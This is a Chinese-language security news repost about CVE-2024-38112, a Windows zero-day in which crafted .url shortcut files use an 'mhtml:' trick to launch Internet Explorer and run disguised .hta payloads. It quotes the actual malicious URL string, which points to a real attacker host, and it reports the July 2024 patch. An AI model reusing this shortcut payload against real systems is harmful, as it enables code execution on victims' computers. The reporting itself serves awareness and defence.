Check Point Research 的网络安全研究人员发现了一种新型零日漏洞,该漏洞利用看似无害的 Windows Internet 快捷方式文件 (.url) 来攻击毫无戒备的用户。这种复杂的攻击使早已停用的 Internet Explorer (IE) 浏览器复活,为在最新的 Windows 10 和 11 操作系统上执行恶意代码打开了大门。
攻击者使用 .url 文件,这些文件通常用作网站的快捷方式。然而,在这种情况下,它们被精心设计来调用 Internet Explorer(这是微软因存在大量安全漏洞而停用的浏览器。)威胁行为者巧妙地在 URL 字符串中使用了“mhtml”技巧来掩盖恶意意图。
恶意 .url 样本的内容 | 图片:Check Point
这种方法并不完全是新的。它是之前在 CVE-2021-40444 0day攻击中使用的一种技术,其中 Word 文档中的类似字符串利用了漏洞。这里,.url 文件包含:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html这种特殊的格式会诱使系统使用 IE 而不是更安全的浏览器打开 URL。这种方法至少从 2023 年 1 月开始活跃,最新的样本是在 2024 年 5 月 13 日观察到的。
当受害者双击 .url 文件时,会出现 IE 和升级窗口对话框 | 图片:Check Point
一旦启动 IE,漏洞就会利用浏览器过时的安全功能。攻击者采用进一步的技巧,将恶意 .hta(HTML 应用程序)文件伪装成 PDF,绕过安全警告,导致在受害者的计算机上执行有害代码。
微软已在 2024 年 7 月补丁星期二更新中解决了该0day漏洞(编号为CVE-2024-38112 )。强烈建议 Windows 用户立即应用此补丁来保护其系统。
强烈建议 Windows 用户立即应用最新的安全补丁。此外,保持警惕至关重要,尤其是对于来自不受信任来源的 .url 文件。虽然这种攻击媒介需要多次用户交互才能成功,但安全意识和谨慎可以防止被利用。
微软 2024 年 7 月补丁星期二修复了 142 个漏洞,包括 5 个严重漏洞和 134 个重要严重漏洞。除了 CVE-2024-38112 之外,微软还修复了其他 3 个已知在野利用的0day漏洞( CVE-2024-38080、CVE-2024-35264、CVE-2024-37985 )。
如需了解更详细的技术见解,请访问Check Point Research 的官方博客。
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
原文始发于微信公众号(独眼情报):Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论